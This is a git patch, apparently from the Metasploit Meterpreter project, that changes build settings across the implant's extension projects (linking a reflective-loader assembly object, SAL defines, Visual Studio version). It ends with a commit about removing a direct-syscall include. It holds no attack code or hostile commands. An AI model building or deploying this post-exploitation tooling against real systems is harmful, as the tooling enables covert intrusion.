copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -452,6 +458,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -459,4 +477,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt index 2112b8f0b..6753f1b78 100644 --- a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt @@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS psapi ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj index 3e86f8957..3a7e798f7 100644 --- a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj +++ b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj @@ -153,6 +153,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -209,6 +210,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -264,6 +266,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -320,6 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -377,6 +381,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -433,6 +438,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -453,6 +459,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -460,4 +478,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt index ab27c4516..da2fa9266 100644 --- a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt @@ -42,6 +42,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -68,7 +72,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj index f7d4d1a84..d005b53bb 100644 --- a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj +++ b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj @@ -170,6 +170,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -243,6 +244,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -316,6 +318,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -389,6 +392,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -461,6 +465,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -533,6 +538,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -603,8 +609,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt index ed6f16b36..8a6de2107 100644 --- a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt @@ -55,7 +55,7 @@ set(LINK_LIBS ${LIBRESSL_LIB_DIR}/tls-20.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj index 6929a8b7c..a29adbdd6 100755 --- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj +++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -210,6 +211,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -267,6 +269,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -382,6 +386,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -439,6 +444,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -811,9 +817,19 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" true true + + true + true + true + + + true + true + true + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters index e9ab9a205..ab90e5c43 100755 --- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters @@ -1043,6 +1043,7 @@ Modules + @@ -1058,5 +1059,7 @@ Modules\_ctypes + + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt index 366cf1039..6f4408066 100644 --- a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt @@ -38,7 +38,7 @@ if(IS_X64) endif() set(LINK_LIBS ${PSSDK_LIB_DIR}/pssdk_vc${PSSDK_VER}_mt.lib ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj index 8473e05af..9993531bf 100644 --- a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj +++ b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj @@ -140,6 +140,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -273,6 +275,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -339,6 +342,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -360,6 +364,16 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) + + + true + true + + + true + true + + @@ -367,4 +381,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt index 813117b2d..838f53c8c 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt @@ -58,7 +58,7 @@ if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) # Post processing (required for all Meterpreter DLLs) editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj index 8256f7229..26e85ed1d 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj @@ -171,6 +171,7 @@ /ignore:4070 %(AdditionalOptions) false + No true @@ -239,6 +240,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false + No true @@ -306,6 +308,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) /ignore:4070 %(AdditionalOptions) false + No true @@ -372,6 +375,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) false + No true @@ -439,6 +443,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false + No true @@ -505,6 +510,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) /ignore:4070 %(AdditionalOptions) false + No true @@ -593,6 +599,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -600,4 +618,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt index 0f1b5e349..441903957 100644 --- a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt @@ -27,7 +27,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj index 085a3deb0..7b3cceace 100644 --- a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj +++ b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -315,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -370,6 +374,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -424,6 +429,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -442,6 +448,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -449,4 +467,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt index 99c8eaa32..44401059a 100644 --- a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt @@ -43,7 +43,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj index 77709c765..03ac0a384 100644 --- a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj +++ b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj @@ -151,6 +151,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -205,6 +206,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -258,6 +260,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -312,6 +315,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -367,6 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -421,6 +426,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -446,8 +452,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false + + + true + true + true + + + true + true + true + + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln index 453025ea6..df9f541d6 100644 --- a/c/meterpreter/workspace/meterpreter.sln +++ b/c/meterpreter/workspace/meterpreter.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 -# Visual Studio Version 17 -VisualStudioVersion = 17.0.32112.339 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.33801.447 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}" EndProject diff --git a/c/meterpreter/workspace/metsrv/CMakeLists.txt b/c/meterpreter/workspace/metsrv/CMakeLists.txt index 0cf47cde8..c75dc8b11 100644 --- a/c/meterpreter/workspace/metsrv/CMakeLists.txt +++ b/c/meterpreter/workspace/metsrv/CMakeLists.txt @@ -38,7 +38,7 @@ else() set(LINK_LIBS ${LINK_LIBS} ws2_32) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) # Post processing (required for all Meterpreter DLLs) editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj b/c/meterpreter/workspace/metsrv/metsrv.vcxproj index e307b3993..f08b1b983 100644 --- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj +++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj @@ -174,6 +174,7 @@ Windows /ignore:4070 %(AdditionalOptions) + No true @@ -246,6 +247,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No true @@ -316,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) Windows /ignore:4070 %(AdditionalOptions) + No true @@ -338,7 +341,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - MinSpace + Custom OnlyExplicitInline Size ..\..\source\ReflectiveDLLInjection\common;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories) @@ -359,6 +362,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" true true true + true NDEBUG;%(PreprocessorDefinitions) @@ -384,6 +388,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" Windows /ignore:4070 %(AdditionalOptions) + No true @@ -453,6 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No true @@ -521,6 +527,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) Windows /ignore:4070 %(AdditionalOptions) + No true @@ -590,6 +597,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters index 5a497eff9..31fe6945c 100644 --- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters +++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters @@ -55,4 +55,8 @@ + + + + \ No newline at end of file diff --git a/c/meterpreter/workspace/screenshot/CMakeLists.txt b/c/meterpreter/workspace/screenshot/CMakeLists.txt index fbecb862f..da3ffcc44 100644 --- a/c/meterpreter/workspace/screenshot/CMakeLists.txt +++ b/c/meterpreter/workspace/screenshot/CMakeLists.txt @@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/screenshot/screenshot.vcxproj b/c/meterpreter/workspace/screenshot/screenshot.vcxproj index b6f2b02e1..3186ca82a 100644 --- a/c/meterpreter/workspace/screenshot/screenshot.vcxproj +++ b/c/meterpreter/workspace/screenshot/screenshot.vcxproj @@ -149,6 +149,7 @@ $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -196,6 +197,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -242,6 +244,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -290,6 +293,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -340,6 +344,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -388,6 +393,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -403,6 +409,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -410,4 +428,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file From a5e33d167d4a71d82df3d13e37fea3f113728d2a Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Wed, 10 Jan 2024 14:42:45 +0100 Subject: [PATCH 10/14] Remove include DirectSyscall.c --- c/meterpreter/source/ReflectiveDLLInjection | 2 +- c/meterpreter/source/common/common_command_ids.h | 0 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c | 0 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h | 0 c/meterpreter/source/dump_sam/dump_sam.c | 1 - c/meterpreter/source/dump_sam/dump_sam.def | 0 c/meterpreter/source/elevator/elevator.c | 1 - c/meterpreter/source/extensions/bofloader/bofloader.c | 1 - c/meterpreter/source/extensions/espia/espia.c | 1 - c/meterpreter/source/extensions/extapi/extapi.c | 1 - c/meterpreter/source/extensions/extapi/ntds.c | 0 c/meterpreter/source/extensions/incognito/incognito.c | 1 - c/meterpreter/source/extensions/kiwi/main.c | 1 - c/meterpreter/source/extensions/lanattacks/lanattacks.c | 1 - c/meterpreter/source/extensions/peinjector/headers.h | 0 c/meterpreter/source/extensions/peinjector/libpefile.c | 0 c/meterpreter/source/extensions/peinjector/libpefile.h | 0 c/meterpreter/source/extensions/peinjector/libpeinfect.c | 0 c/meterpreter/source/extensions/peinjector/libpeinfect.h | 0 .../source/extensions/peinjector/libpeinfect_obfuscator.c | 0 .../source/extensions/peinjector/libpeinfect_obfuscator.h | 0 c/meterpreter/source/extensions/peinjector/libpetool.c | 0 c/meterpreter/source/extensions/peinjector/libpetool.h | 0 c/meterpreter/source/extensions/peinjector/peinjector.c | 1 - c/meterpreter/source/extensions/peinjector/peinjector.h | 0 c/meterpreter/source/extensions/peinjector/peinjector_bridge.c | 0 c/meterpreter/source/extensions/peinjector/peinjector_bridge.h | 0 c/meterpreter/source/extensions/powershell/powershell.c | 1 - c/meterpreter/source/extensions/powershell/powershell.h | 0 .../source/extensions/powershell/powershell_bindings.cpp | 0 .../source/extensions/powershell/powershell_bindings.h | 0 .../source/extensions/powershell/powershell_bridge.cpp | 0 c/meterpreter/source/extensions/powershell/powershell_bridge.h | 0 